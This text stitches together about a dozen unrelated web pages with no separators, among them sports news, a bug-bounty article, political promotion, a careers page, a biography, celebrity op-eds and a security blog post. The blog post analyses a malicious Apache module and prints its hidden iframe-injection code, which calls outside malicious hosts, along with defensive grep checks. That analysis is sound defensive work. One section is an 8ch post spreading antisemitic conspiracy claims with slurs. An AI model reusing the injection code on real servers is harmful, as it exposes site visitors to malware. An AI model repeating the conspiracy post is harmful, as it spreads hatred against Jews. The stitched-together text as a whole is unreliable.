I know it's worth about €12m (£9.4m). And you can hardly get a player for that! We've just signed Lanzini on a permanent deal for that sort of money.
Juventus went all the way last season and it was worth €67m (£52m) to them. And we're not going to go all the way, are we?
We could have got £10m more by raising the prices at the Olympic Stadium, but we have gone for prices to please rather than extort money from our fans.
Juventus earned around £50m for reaching the Champions League final last season, where they lost to Barça
How are the sales going?
We're sold out at 54,000, which is the current capacity. We will increase it to 60,000 for the start of next season, subject to planning. And the year after, we might go to 66,000. Football is about taking your chances and this is a chance.
Chelsea will be very strong again next season, mark my words. The competition will be fierce but we are loving being among it. It's a season you never want to end.
I hope Leicester wins the league and we win the Cup and finish fourth. Imagine starting in the new stadium with that on our cv...
Fall of the Krays is out on DVD, Blu-Ray and Double Pack next Monday.
Nintendo has made an unexpected move when it announced that the company will be giving a big amount of money to Switch owners that manage to find any vulnerability in the console. And in order to motivate anyone and everyone who might have something to contribute, Nintendo has offered a reward of $20,000.
The public security flaw hunt that Nintendo likes so much has officially been extended to the Nintendo Switch console. Compensation for finding any sort of vulnerability in its software is quite big, but it will still vary from $100 to $20,000, depending on the severity of the flaw itself. The bug hunt has already made many of the hunters work hard to find any sort of flaw.
Rewards were already offered for everyone who manages to find vulnerabilities found on Nintendo 3DS and the New 3DS. Rewards have been offered through the bug-hunting site called HackerOne, and the project was first launched in December 2016. Three people have already been rewarded, however, not much is known about the amount.
It would appear that Nintendo has a general idea about where the vulnerabilities might be detected, and as we found out, it's interested in four different areas that include:
– Kernel Takeover
– Userland takeover
– Privilege escalation from userland
– ARM® TrustZone® takeover
The general policy is that everyone who reports a new vulnerability (that's worth reporting), will be rewarded by the company as soon as the flaw is fixed, or in worst case scenario, in four months after the report has been submitted.
Big-time companies offering money for detecting flaws in their systems is not a new thing, and pretty much every big company out there has done it at one time. Some of them even did it on more than one occasion, and for others, it's a regular practice. For example, Facebook and Google themselves have used this method of patching up their flawed systems. This is seen as one of many ways in which companies can progress, and bug hunters can earn quite a lot of money, depending on how serious the flaw they found was.
The reason that this works is mostly because more eyes see more things, and so the more people try to find vulnerabilities, the more of them will be found. A perfect system doesn't exist, but that doesn't mean that perfecting the systems is off the table.
There's a new player on the American political battlefield that should put fear in hearts of Washington, DC's “uni-party” politicians – it's called the MAGA Coalition – and its mission is to identify the obstructionists in DC and to advance the America First agenda.
The organization's mission statement channels what millions of Americans thought they were getting on Election Day 2016, but Congress has failed to produce:
For too long our politicians in Congress have failed to help us facilitate efforts to make this country great again. We have made it our mission to identify the obstructionists in DC and to advocate the America First principles that catapulted Donald Trump to the White House.
We have seen the establishment on both sides of the aisle work night and day to derail the agenda of returning our nation back to prosperity and security. It's time we put our fate back into our own hands. The MAGA Coalition will reach out to everyday Americans and build an unprecedented model of grassroots activism. No longer will we stand by and let the entrenched powers that be in the establishment dictate our future with apathy and inaction. We will empower ourselves through investment and action.
The MAGA Coalition will work to support candidates across this country who share our passion for putting America First again. We will provide a place for volunteers to empower themselves and engage the voters state by state to elect lawmakers who are committed to making this country great again.
Independently, we will work day in and day out to let Congress know that we will settle for nothing less than what we voted for last November. We will put the needs of our citizens, our neighbors and our families ahead of the status quo of establishment politics.
Our mission is to bring to life the hope and promise we all felt when we voted for change and for a new day in America. We demand Fair Trade, Border Security, Reduced Taxes and Protection of the 2nd Amendment. The MAGA Coalition is committed to minimizing costs and maximizing your investment in our efforts. Together, we will get busy Making America Great Again!
All of these principles and ideas are great policies behind which to solidify the Trump coalition into a new voting bloc that transcends the corrupt Capitol Hill establishment.
And we are particularly encouraged that our friend Dr. Seb Gorka has joined the MAGA Coalition as chief strategist.
Gorka has given frequent media appearances and speeches since his resignation from the administration and was one of the most effective advocates for the MAGA agenda during his time at the White House.
And perhaps most importantly, we know Seb Gorka and we know from our personal association he's a true believer in the MAGA agenda.
Gorka has been a particularly outspoken advocate of tough U.S. anti-terrorism policies and in the past made the case that Obama-era efforts to counter Islamic State and other jihadist propaganda were “pin-pricks and often counter-productive.”
Prior to his time at the White House, Dr. Gorka was national security editor at Breitbart.com, and taught classes at the US Marine Corps University.
Dr. Gorka will make his first appearance for the group later today alongside Sarah Palin in Montgomery, Alabama on behalf of Judge Roy Moore's Senate campaign.
Another reason we like what we see in the MAGA Coalition is that it is headed by Adam Gingrich, who was a prime mover in President Trump's Pennsylvania political operation. Mr. Gingrich's welcome message was straight out of Trump's “forgotten Americans” speeches:
The political process is broken, we need concerned and caring citizen activists to join us in promoting the process of healing it. The MAGA Coalition promotes an America first agenda. Every citizen of this great nation, no matter their creed, color, race or orientation, deserves the chance to succeed. We seek to project strength abroad and unity at home. We advocate for free market health care solutions, fair taxation policy, a strong military, lower government spending, fair trade, protection of our 2nd Amendment rights and putting this great nation first again.
This shows us the MAGA Coalition leadership gets the power of Trump's message to working Americans. And of course, it doesn't hurt that that same welcome message channels a message CHQ Chairman Richard A. Viguerie closes many of his talks and columns with: If not now, when? If not us, who?
To learn more about the MAGA Coalition click this link.
Littelfuse is a company of innovators. We hire bright minds who want to make a big impact. We are committed to improve the safety, reliability and performance of More [ + ]
products that use electrical energy. Find your future with us by learning more about what we do.
Click here to search our job openings.
Shape your career with Littelfuse
Littelfuse associates experience a culture driven by innovation and diversity. We come to work with energy and enthusiasm to make a positive difference for our customers. When you join Littelfuse, the company's onboarding programs will help you make a smooth transition. We offer training, tuition reimbursement, and development programs to help associates at every stage of their career. In addition, associates may be provided opportunities to work in different businesses and locations within the company.
We value professional development and growth, and work collaboratively to empower our associates. We embrace new challenges together, with confidence and open minds.
Discover how working with us will help you realize your full potential.
90 years of engineering and innovation
A passion for engineering excellence and an innovative spirit have been a part of what it means to work at Littelfuse since our founding in 1927. Littelfuse associates worldwide play a crucial role in serving customers, positively contributing to the company's strategic purpose and achievement of results.
For more than 90 years, our company and its associates have provided engineering solutions for the growing and evolving needs of our customers. Today, Littelfuse is a global leader in circuit protection, power control and sensing technologies for the electronics, automotive and industrial markets. We are a $1 billion company employing more than 11,000 associates in a network of more than 50 locations throughout the Americas, Europe and Asia.
Our circuit protection solutions help safeguard people and products in a wide variety of applications such as smartphones, tablet computers, electric vehicles, LED lighting, and home appliances. Our power control products help reduce costs from electrical damage in applications like automotive electronics, data centers, telecommunications and networking equipment. And, our sensing products support complex electronic systems in applications such as vehicle lift gates, refrigerator and garage doors, dishwashers, smart meters, thermostats, and many more.
Apply now to join us!
Loading site search ...
10 Sep 12 Filed in Short Attack Reviews
It's a follow up to my post about server-wide iframe injection attack where I asked for any information about that tricky hack. Thanks to my readers and administrators of infected servers I have some new information about it. Now I know how it works and what is infected, but still have no idea how hackers break into servers, so your input is welcome.
Recap
This attack injects invisible malicious iframes into some server responses of all web sites on compromised servers. Typical code looks like this:
<style>.tlqvepxi { position:absolute; left:-1648px; top:-1752px} </style> <div class="tlqvepxi">
<iframe src="hxxp://matisere .com/21234443.html" width="581" height="476"></iframe></div>
in web pages and
document.write('<style>.hmfabv9 { position:absolute; left:-1141px; top:-1518px} </style> <div class="hmfabv9">
<iframe src="hxxp://sepatch .org/35204443.html" width="122" height="202"></iframe></div>');
in .js files.
All numeric parts and style names in this code are random. Iframe URLs synchronously change on all infected servers several times a day. They point to malicious pages on compromised third-party legitimate sites:
hxxp://sepatch .org/35204443.html
hxxp://ksner .pl/79144443.html
hxxp://hdreceivermitfestplatte .com/84064443.html
hxxp://quandlarcencielnaitra .com/14464443.html
hxxp://sepatch .org/35204443.html
hxxp://zsaugustowo .pl/40534443.html
hxxp://matisere .com/76254443.html
hxxp://pokercompany .com/46254443.html
hxxp://goplast .it/61114443.html
hxxp://grupamuzyczna .foxnet .pl/54344443.html
hxxp://michaelgaigg .com/88224443.html
hxxp://enertres .com/95154443.html
hxxp://sexualreawakening .com/56684443.html
hxxp://deasocial .com/65674443.html
hxxp://stampsbypost .com/44644443.html
hxxp://pcstation .es/32634443.html
hxxp://awakenedwithin .com/41714443.html
hxxp://paraguana .diocesis .ws/27944443.html
hxxp://viveenarte .com .ar/31744443.html
hxxp://thinkipa .com/52984443.html
hxxp://barclaywebdesign .ca/36234443.html
hxxp://mullerinstalacoes .com .br/99814443.html
hxxp://ultimateplrpack .com/51794443.html
hxxp://hotelcandeiasubatuba .com .br/14464443.html
hxxp://astroindia .com/15854443.html
hxxp://zerrozipshoppos .com/?a=YWZmaWQ9MDUyODg=
hxxp://webtrackerswimp .org/?a=YWZmaWQ9MDUyODg=
hxxp://bombkansas .info/?a=YWZmaWQ9MDUyODg=
hxxp://motorcyclecycling .org/?a=YWZmaWQ9MDUyODg=
…
As you can see all URLs end with either “4443.html” or “?a=YWZmaWQ9MDUyODg=“. Such URLs are good both for tracking and for adding appropriate rewrite rules for relatively random URLs on compromised sites.
Malicious Apache module
It turned out that all affected servers had infected Apache web server. Specifically, there was a malicious Apache .so module that injected all those iframes into server responses.
On the two servers that I worked with, the names of the malicious modules were: mod_spm_headers.so and mod_spm_mem.so. The file names may vary on different servers. I know that it could also be mod_log.so and mod_security.so.
They can be usually found in /usr/lib/httpd/modules or /usr/lib64/httpd/modules or whatever is your Apache module directory is. Sometimes the file is in the /usr/lib and symlinked to Apache modules directory.
In httpd.conf there should be a corresponding line like:
LoadModule spm_headers_module modules/mod_spm_headers.so
In some cases this line can be found in httpd.conf include files, e.g. extra/httpd-includes.conf.
The rogue Apache modules have the same timestamp as the rest legitimate modules (it quite easy to touch them) and their names look innocuous (didn't you expect malicious_iframes.so after all?). So you should either check file names agains the list of real Apache modules or search for .so files that contain strings specific to these malicious modules. For example the following command should help reveal malicious .so file in the directory with Apache modules.
ls *.so | xargs strings | grep "module switcher"
or
ls *.so | xargs strings | grep dlEngine
What does this module do?
If you check output of the Linux strings command for those .so files, you will find quite descriptive keywords that give you an idea of what they do.
_CHECK_RAW_COOKIE
KEY_CLIENT
_CHECK_SITE_KERNEL
_CHECK_REFERER_IS_HOST
base64decode
xor_decrypt_string
xor_encrypt_string
_GEN_FILENAME_BLACKLIST
_CHECK_REFERER_IS_SEO
SIZE_ARRAY_SE_REFERER
_CHECK_BOT_USERAGENT
SIZE_ARRAY_BAN_USERAGENT
_ADD_TO_BLACKLIST
_CHECK_SITE_ADMIN
SIZE_ARRAY_BLACKLIST_URI
CLIENT_IP
SIZE_ARRAY_BAN_PROC
_IS_SUDOER
SIZE_ARRAY_SUDOERS
_CHECK_BLACKLIST
_INJECT_SKIP
_ADD_TO_WAITLIST
GEN_FILENAME_WAITLIST
_SESSION_DELETE
GEN_FILENAME_SESSION
_SESSION_KEYGEN
_SET_COOKIE_KEY
_INJECT_SAVE
GEN_FILENAME_INJECT
_SESSION_SAVE
_CHECK_LOCAL_IP
_SESSION_LOAD
_INJECT_UPDATE
FILENAME_UPDATING
_CHECK_WAITLIST
_INJECT_LOAD
_INJECT_DO
SIZE_ARRAY_TAGS_FOR_INJECT
KEY_XOR
C_MODULE_VERSION
C_CC_HOST
C_CC_URI
C_CC_REQUEST_FORMAT
C_MARKER_LEFT
C_MARKER_RIGHT
C_TMP_DIR
C_LIST_PREF
C_KEY_COOKIE_NAME
C_ARRAY_TAGS_FOR_INJECT
C_ARRAY_BAN_USERAGENT
C_ARRAY_BLACKLIST_URI
C_ARRAY_SE_REFERER
C_ARRAY_SUDOERS
C_ARRAY_BAN_PROC
C_ARRAY_BAN_LOCAL_IP
dlEngine
dl module switcher
As you can see, this module checks cookies, Referrer and User-Agent headers, tries to identify unwanted traffic from search engine bots (_CHECK_BOT_USERAGENT) and site admins (_CHECK_SITE_ADMIN) and server admins (_IS_SUDOER) and blacklists such requests (_ADD_TO_BLACKLIST). Then it checks if the visitor is coming form search engine results (_CHECK_REFERER_IS_SEO, C_ARRAY_SE_REFERER) and injects something (_INJECT_DO) after specific tags (C_ARRAY_TAGS_FOR_INJECT). Moreover, this module works with encrypted content (base64decode, xor_decrypt_string, xor_encrypt_string). You definitely don't expect to see something like that in a legitimate module named mod_spm_headers.so!
These “strings” helped me find the source code of an older version of the malicious Apache module http://pastebin.com/6wWVsstj. The current version has changed since then but this code helps understand how this module works.
It's a typical “filter” Apache module that works in the middle of Apache pipeline: it gets generated response, modifies it if needed and passes it further to Apache. Most constants are encrypted using XOR. Although it's a very simple encryption algorithm, it helps to hide constant values (URLs, filenames, etc. ) from people trying to extract meaningful strings from compiled .so files. The module used (in that old version) quite complex rules for injections: Requests should not come from IP addresses of search engines and security companies User-Agent should not contain strings specific to search engines' bots, automated tools (e.g. Curl, Indy Library) and browsers that the attackers are not interested in (Opera Mini, browsers on Macs, iPhones, PlayStations). Requests should not come from blacklisted and temporary “suspended” IPs (see below). If request looks “good” and it has a search engine as a Referrer (search traffic), then the module creates a 5 minutes‘ session for that IP address. Then if the requested page includes some .js files from the same domain or if that user clicks on some site level links within those 5 minutes then the loaded .js files or the next site page (counted as a second hit during the session) will contain injected malicious code. And after that the attacked IP is “suspended” for the next 7 days. — Quite complex, isn't it? No wonder, it was hard to detect. However, the infection rate was probably suboptimal either and the current version of the malicious module uses less complex rules. The module only works with responses that have the following types: “text/html“, “javascript“, “text/js” (web pages and JavaScript files). In web pages, it searches for the first of the following tags: </script>, </style>, </head>, </title>, </body>, </html> and injects the malicious code right after it. In JavaScript files, it injects the malicious code as a document.write(<malicious HTML code>) call. The malicious code is cached in a file (see below) and is getting updated from a remote server every 10 minutes. It is not necessary that it receives completely new code every 10 minutes (in practice it changes about once every hour) but potentially it can change that often.
Blacklists
The module checks the /var/run/utmp file to see if the current visitor IP is the same as one of the IPs of users currently logged into this server. Such users are most likely site webmasters or server admins. They should not be aware of the infection so their IPs are getting blacklisted.
The same happens to users who open web pages that contain the word “admin” in their URLs. Hackers assume that such users are most likely site admins or site owners who should also not know about the security issue. Their IPs are also permanently blacklisted.
For other visitors, the module can work in two modes:
in DO_BAN_SITEKERNEL , every visitor that comes to site directly (without an external referrer) gets blacklisted
, every visitor that comes to site directly (without an external referrer) gets blacklisted in DO_EXPLOIT_ONLY_SEO, every visitor who doesn't come from search engines gets blacklisted
Maintenance files
/var/tmp/sess_<md5(visitorIP)> — blacklist file for a specific visitor (empty. Visitor is blacklisted if this file exists)
/var/tmp/sess_<md5(md5(visitorIP))> — session file for a specific visitor (contains session information: timestamp, referrers, session key and visit number)
/var/tmp/sess_<md5(md5(md5(visitorIP)))> — temporary “ban” file for a specific visitor (contains the time when the visitor was “suspended” – expires in 7 days)
/var/tmp/sess_<md5(“cache”)> (/var/tmp/sess_0fea6a13c52b4d4725368f24b045ca84 ?) — cache file. It contains a timestamp (required to figure out whether the current malicious code is expired – 10 minutes) and the current malicious code (xor-encrypted).
New information required
This information is mainly based on the analysis of the source code of that one year old version of the malicious Apache module. Most of it is still true but some things have definitely changed. For example, server admins who sent me the malicious .so files could find session and cache files in the /var/tmp directory. I can also see some change in the injection algorithm. And the .so files contain some new strings literals. It is also not clear what is that remote URL where the malware gets new iframe codes from.
If you know how to decompile Linux .so files (ELF) you can contact me and I'll send you the files I have.
Spreading of the attack
During my investigation I found quite a few forum posts and articles about the malicious Apache modules. Some of them are a couple of years old and some are quite new.
Here are just some of them:
Such attacks remain latent because of the complexity of detection. I rarely come across such things myself. However this summer I got more that usually requests from webmasters of sites on infected servers. This may be a sign of an increased activity of this attack. I wonder how many servers are currently infected.
Mysterious infection vector
While this hack is not new, I couldn't find reliable information about how hackers break into servers and get root access (the malicious modules are owned by root and httpd.conf files can only be modified by root).
At this point I can say that it doesn't look like a security issue of some control panel. The two infected sites I worked with had different control panels: Virtualmin and cPanel.
The malicious module doesn't come from Linux repositories.
So someone somehow breaks into servers with root permissions, which is quite alarming.
One of the servers had only one user (dedicated server), used strong passwords, didn't allow remote root logins, used custom ports and fail2ban to prevent brute-force attack. Nonetheless it was hacked within one month and its administrator couldn't find sings of the intrusion in logs files, only legitimate logins (of course, with root access, it is possible to remove most traces).
To server administrators
If you use Apache 2.x on your server, I recommend that you check if all Apache modules on your server are legitimate.
The following commands are a good start:
cd <Apache Module Dir>
ls *.so | xargs strings | grep "module switcher"
or
ls *.so | xargs strings | grep dlEngine
You should also check all modules loaded in httpd.conf and its include files.
##
Do you have anything to add? Your thoughts and comments are welcome! I'm particularly interested in how hackers gain root access on those servers and where the rogue modules download the updated malicious code from.
Related posts:
Managing Director, Karl Gnadt, and Grants Manager, Jane Sullivan, stand in front of their new solar panels that will help run the new CUMTD Hydrogen Fuel Cell Buses. The buses are set to be replaced some time in 2019.
Managing Director, Karl Gnadt, and Grants Manager, Jane Sullivan, stand in front of their new solar panels that will help run the new CUMTD Hydrogen Fuel Cell Buses. The buses are set to be replaced some time in 2019.
Managing Director, Karl Gnadt, and Grants Manager, Jane Sullivan, stand in front of their new solar panels that will help run the new CUMTD Hydrogen Fuel Cell Buses. The buses are set to be replaced some time in 2019.
After partnering with the Center for Transportation and the Environment (CTE), the Champaign-Urbana Mass Transit District (CUMTD) was awarded $1.45 million by the Federal Transit Administration to update city buses.
The new buses will replace two of the standard diesel-powered buses that are 16 years old. The recommendation is to keep buses for up to twelve years, so those have exceeded their useful life, said Jane Sullivan, grants manager, CUMTD.
The grant will help pay for the more expensive hydrogen fuel cell buses, and CUMTD wants to produce their own hydrogen on site, said Karl Gnadt, managing director of CUMTD.
In addition to buying buses, CUMTD will build the infrastructure that allows them to produce hydrogen with the grant money.
A standard diesel bus costs approximately, $300,000 whereas a hybrid costs about $30,000 more, according to ThoughtCo.
Hydrogen fuel cell buses are more expensive than a standard diesel or hybrid bus, and CUMTD is purchasing 60-foot buses, which is an “up-charge,” said Gnadt.
In order to execute the plan, they will use electrolysis. Then, they will release the oxygen and store the hydrogen in a tank. The hydrogen is then injected into the the fuel cell on the bus.
Chemically, they will reintroduce oxygen to create water. The process will release energy that will power the electric motor that runs the bus.
The buses will run by a chemical process, as opposed to a burning process, and will have zero emissions. As opposed to releasing carbon into the environment, the hydrogen fuel cell buses will only emit drinkable water, said Sullivan.
The buses will be “quietly driven vehicle(s)” because “there's no engine … just an electric motor,” said Gnadt.
As of now, CUMTD uses solar panels as an energy source. They plan on expanding their solar array in an effort to lower the costs of production for the hydrogen fuel cell buses.
Gnadt said, CUMTD's focus is, “not just what is released into the environment, but we're also not depleting natural resources.”
CTE is a non-profit organization that assisted CUMTD in research and finding funding for the hydrogen fuel cell buses, said Jane Sullivan, grants manager of CUMTD. CUMTD's effort to reduce Champaign-Urbana's carbon footprint has been long-standing.
Their move toward hydrogen fuel is the next step in a virtually decade-long promise to purchasing buses less dependent on diesel fuel.
“A pile of carbon released by one diesel-fueled bus, in a day, would be equivalent to the size of a 2,000-square-foot house,” Assistant Professor of Mechanical Engineering, Kyle Smith said.
The hydrogen fuel cell buses are expected to hit the road in 2019.
[email protected]
From this post. https://8ch.net/posttest/res/821.html#821
It has come to my attention that you faggots are heavily influenced by JIDF and believe whatever shit the news/jews tell you.
Have you faggots forgotten who was behind 9/11, JFK, MLK, RFK, JFK Jr, Malcolm X, Federal Reserve, 1918 Hyperinflation, 1939 Danzig Massacre, The Communist Revolution and Russian Civil War, the fall of Germany 2x, Sandy Hook, Boston Bombing, Ottawa Shooting, 7/7, Woolwich, UCSB Shooting, Oregon, Charleston, Lavon Affiar, USS Liberty, Gulf of Tonkin, Iraq + 7 Countries, Refugee Crisis and The Destabilization of the Middle East? ==Picture1==Netanyahu warns of 'grave mistake' if France recognises Palestine http://www.businessinsider.com/afp-netanyahu-warns-of-grave-mistake-if-france-recognises-palestine-2014-11?IR=T
<France Recognizes Palestine
Picture2
<Staged shooting blamed on Muslim hatred of a cartoon that was drawn 20 years ago.
<Terrorists' ID found by "accident" 9/11 style during the Charlie Hebdo shooting
<Lead investigator commits suicide with 2 bullets in the head the night of the Charlie Hebdo shooting
<every Charlie Hebdo employee is killed except the owners, the top brass is unharmed
<terrorist shoots cop on sidewalk, no recoil from gun,
<terrorist drops his ID at the site out of purecoincidene.jpg
<Benjamin netanyahu flies to France against the wishes of the French President to invite all French Jews to Israel
<gets told fucking off in french by french Jews
<next day. swastikas are found spray painted in a jew cemetery
<No one saw the shooters except the MSM
<terrorist then targets Kosher store, Car conveniently parked on marked tape next to Kosher store
==Picture3== Paris Attack, Lets see how similar this event is
Jewish owners sold Paris's Bataclan theater right before the attack.
<The Bataclan theater, targeted in Friday night's Paris terror attacks, was Jewish-owned for decades, but was sold two months ago, its former owners said.
<Passports of suicide bomber magically survives 9/11 Style
<Terrorists called "For Syria" before attacking
<not for Islamic state, not for Islam "For Syria"
How convenient is that, they call the only place where Israel wants to be ground invaded right now. Not a week has passed before blowing up the russian plane
<CIA Director John Brennan met with Mossad (Israeli intelligence and covert operations), MI6 (British secret intelligence) and the French Security Chief two weeks ago
Former Rangers owner Craig Whyte today gave the club a vote of confidence - and said he was still a fan.
Mr Whyte said it was inevitable that Rangers would return to the top of Scottish football. And he said he would always be a supporter.
He was speaking after leaving the High Court in London where he had appeared for the latest hearing of a legal dispute he is involved in with a ticketing firm.
Mr Whyte, 43, had been ordered to pay more than £17 million damages to Ticketus last year.
Ticketus had said Mr Whyte fraudulently or negligently made representations which induced the company to enter into agreements related to the sale or purchase of Rangers season tickets.
Mr Whyte had disputed the claim - but a judge had ruled against him.
Ticketus says the latest stage of proceedings involves its ''continued activity to enforce" the damages order.
Mr Whyte had earlier this year failed to attend a hearing.
He had been made the subject of a ''suspended committal order'' - under which he could have been jailed if found to be in contempt of court.
And a judge had issued an arrest warrant. But Mr Justice Newey discharged that committal order today - lifting the threat of jail - after Mr Whyte appeared in court.
Lawyers for Mr Whyte said he had been out of the country and he would co-operate.
Mr Justice Newey adjourned proceedings. He said complaints against Mr Whyte would be examined at a later date.
Lawyers representing Mr Whyte today told Mr Justice Newey that because of the "strength of feeling" in Scotland, police had offered Mr Whyte some security advice.
Mr Whyte made no comment about the case as he left court.
But reporters asked if he thought that Rangers would return to the top.
He said "inevitably".
And asked if he was still and fan and would always support the club, he replied "of course" and "yes".
Mr Whyte's appearance at the High Court marked the latest stage in a saga which has seen Rangers slide down the ladder of Scottish football.
He took control of Rangers in 201 - administrators were appointed early the following year.
The Scottish Football Association concluded that Mr Whyte was unfit to hold a position in football after an investigation.
Rangers were ejected from the top-tier Scottish Premier League and effectively relegated to the fourth tier.
They have since climbed back into the Championship - the second tier.
In September this year, Mr Whyte was disqualified from being a director for 15 years after proceedings were launched by regulators the Insolvency Service.
It was alleged that he had failed to promote Rangers' interests and to avoid conflicts of interests
Business Minister Jo Swinson said Mr Whyte had harmed Rangers and its fans and had shown a "lack of regard for proper corporate behaviour".
In November, he appeared in court in Glasgow after being charged with fraud - and was released on bail - following an investigation into the purchase of Rangers in 2011.
James Baskett (February 16, 1904 – July 9, 1948) was an American actor known for his portrayal of Uncle Remus, singing the song "Zip-a-Dee-Doo-Dah" in the 1946 Disney feature film Song of the South. In recognition of his warm portrayal of the famous black storyteller he was given an Honorary Academy Award, making him the first black male performer to receive an Oscar.
Career [ edit ]
After abandoning his plans to study pharmacology for financial reasons, James Baskett supported himself as an actor, moving from his home town of Indianapolis, Indiana to New York City, New York and joining the company of Bill Robinson, better known as Mr. Bojangles. As Jimmie Baskette, he appeared on Broadway with Louis Armstrong in the all-black musical revue Hot Chocolates in 1929, and was announced for Hummin' Sam in 1933, although it failed to open. Mr. Baskett also acted in several all-black films made in the New York area, including Harlem Is Heaven (1932) starring Bill Robinson. He went to Los Angeles, California and had a supporting role in Straight to Heaven (1939), starring Nina Mae McKinney, and bit parts in the films Revenge of the Zombies (1943) and The Heavenly Body (1944). He was invited by Freeman Gosden to join the cast of the Amos 'n' Andy radio show as lawyer Gabby Gibson, whom he portrayed from 1944 to 1948.
In 1945, he auditioned for a bit part voicing one of the animals in the new Disney feature film Song of the South (1946), based on the Uncle Remus stories by Joel Chandler Harris. Walt Disney was impressed with Baskett's talent and hired him on the spot for the lead role of Uncle Remus. Baskett was also given the voice role of Brer Fox, one of the film's animated antagonists, and even filled in as the main animated protagonist, Brer Rabbit, in one sequence. This was one of the first Hollywood portrayals of a black actor as a non-comic character in a leading role in a film meant for general audiences.[1]
Baskett was not allowed to attend the film's premiere in Atlanta, Georgia because Atlanta was racially segregated by law.[2][3]
Although Baskett was occasionally criticized for accepting such a "demeaning" role, his acting was almost universally praised, and columnist Hedda Hopper was one of the many journalists who declared that he should receive an Academy Award for his work.[4]
Academy Award [ edit ]
On March 20, 1948, Baskett received an Honorary Academy Award for his performance as Uncle Remus.[5] He was the first African-American male actor to win an Academy Award.
Illness and death [ edit ]
Baskett had been in poor health around 1946 during the filming of Song of the South due to diabetes and suffered a heart attack. His health continued to decline, and he was often unable to attend the Amos and Andy show he was in. On July 9, 1948 during the show's summer hiatus,[6] Baskett died of heart failure resulting from the diabetes at age 44.[7][8] He is buried at Crown Hill Cemetery in Indianapolis.[9]
Filmography [ edit ]
Year Title Role Notes 1932 Harlem Is Heaven Money Johnson Film debut; credited as Jimmy Baskette 1933 20,000 Cheers for the Chain Gang Vocalist Uncredited 1938 Gone Harlem Credited as Jimmie Baskette 1938 Policy Man Credited as Jimmie Baskette 1939 Straight to Heaven First Detective 1940 Comes Midnight 1941 Dumbo Fat Crow Voice, uncredited 1943 Revenge of the Zombies Lazarus Alternative title: The Corpse Vanished 1944 Porter Uncredited 1946 Song of the South Uncle Remus
Brer Fox (voice) (final film role)
See also [ edit ]
Believe it or not, there are still fans and even pundits who believe a superfight pitting UFC Welterweight Champion Georges St. Pierre against Middleweight Champion Anderson Silva could happen. Someday.
Famed boxing trainer Freddie Roach, who has worked with both men and continues to work closely with St. Pierre, has some cold ice to toss on those hopes.
"Anderson Silva hits harder (than Georges St. Pierre) because he's a lot bigger. But Georges is also a good puncher also. But the thing is, size wise, I think Anderson's a little more fluent at this point. He's a lot bigger than Georges, of course. That's why I don't think that fight, they've been talking about that fight happening, I don't think it will happen. I've talked to Georges about it and (Silva is) just way too big."
Well, gee, that's just downright logical.
Traditionalists, of course, will decry this explanation for why the fight will never come to pass. After all, Royce Gracie ran through all comers in the old days, be they 150 or 250-pounds.
That's ignoring the obvious point, though, that the game has evolved to a point in which size is one of the few advantages modern mixed martial artists have left. With extensive training and practice, not to mention a proven track record of application in the cage, it's hard to tell who would have the advantage in a fantasy match-up between Silva and St. Pierre.
Until one considers their respective size. And therein lies the rub. If Roach is to be believed, even "Rush" knows it may not be worth potentially tarnishing his legacy in an attempt to take down a much bigger foe, even if it would make him the greatest pound-for-pound fighter who ever lived.
It's just too bad, really. There is no bigger fight to make right now or in the history of the game than this one. Oh well. Hear more from Roach after the jump.
Charlie Sheen finds continued success on 'Two and a Half Men,' while Chris Brown is slated to be a musical guest on 'SNL.' Why are we supporting woman-beaters?
I don't care how high-minded you are, if you spend the majority of the day in front of your computer as many of us do, you follow celebrity news to some extent. I'm guilty of knowing who Justin Bieber is dating, although I couldn't name a single one of his songs. However, celebrity news rarely affects my life in any tangible way, until now: I'm not watching Saturday Night Live on February 12.
Despite the tired, “SNL hasn't been good since ___” jokes, I have a season pass on my DVR and watch at least most of it weekly. But on February 12, I'm preemptively deleting my recording because Chris Brown is the musical guest.
How in the holy hell does this guy still have a career?
February 12 is only a few days away from the two year anniversary of the night Chris Brown beat the ever-loving shit out of his then-girlfriend, pop-star Rihanna. In fact, February 12 is the exact day that ABC News released this story about Rihanna telling police that it was not the first time Brown had beaten her.
In case the interceding two years have made us hazy on the details, Brown and Rihanna got into an argument after a Grammy party. During this altercation, Brown “put his hands around her neck and, according to the insider, said, ‘I'm going to kill you!'” The attack left Rihanna with “major contusions on both sides of the singer's face — there [was] serious swelling and bruising. Her lip [was] split and her nose bloody.” She was also left with “bite marks on one of her arms and on several fingers.”
Again, I ask how in the hell does this guy have a career?
I do believe in forgiveness, and I believe in second chances. However, I believe that you have to earn both. Has Chris Brown done this? A few weeks after the assault, he was photographed smiling and flexing his muscles while riding jet skis in Miami. Five months after the attack, he released a scripted, half-hearted video in which he apologizes while not exactly saying what he's apologizing for, and just this past December, he got into a Twitter fight in which he, in part, berated an alleged sexual assault victim.
Of course, Brown isn't the only woman-beater who's currently experiencing success in Hollywood. Charlie Sheen may be causing production delays on Two and a Half Men after his latest bender, but his job seems to be just as secure as ever. The internet seems to be focusing on the more ridiculous aspects of Sheen's current scandal: The briefcase full of coke, the porn, and the hookers, while leaving out some of the less-funny aspects of Sheen's personal life.
Most recently, there was porn star Capri Anderson, who locked herself in the bathroom of the Plaza Hotel room she was sharing with Sheen to protect herself as he went on a violent, drug-fueled rampage. A year ago, Sheen was charged with three crimes stemming from a Christmas attack on his then-wife Brooke Mueller that allegedly involved a knife.
Before Mueller, Sheen's ex-wife, Denise Richards, also claimed that he had abused her. Richards “filed a sworn declaration in the Los Angeles Superior Court, alleging that Sheen assaulted her and threatened her life during a December 2005 altercation at her home. She claims that while visiting with the couple's two children, Sheen called her a series of vulgar names and shoved her to the ground in front of their children.”
Before that, in 1990, Sheen's engagement to actress Kelly Preston ended after he shot her in the arm in what was later ruled to be an “accidental shooting.”
Seemingly every long-term relationship this man is in ends in violence. Yet he is the highest-paid television actor in Hollywood.
Why do we put these men on television? Why do we, as viewers, pay their salaries? As long as men like Brown and Sheen continue to have careers fueled by money we are giving them, then we are sending the message that it's okay to hit women — as long as you can sing or act.
Instead of Entertainment Weekly asking if there's a tasteful way for Brown to do a skit about beating Rihanna (!), why don't we ask why the fuck that is even remotely considered to be a valid question? Instead of debating whether or not advertisers were right to drop Skins because of actors pretending to be teenagers having sex, why don't we ask why advertisers keep paying premium rates for Two and a Half Men? Or why they're not dropping SNL?
Paul Reubens didn't work for a decade after he was caught masturbating in an adult theater, and Janet Jackson was vilified after accidentally showing her nipple at The Super Bowl. These people didn't hurt anyone, yet those who inflict actual physical violence on individuals still earn our entertainment dollars.
It's not fucking okay.
Photo Credit: AP/Kona Gallagher
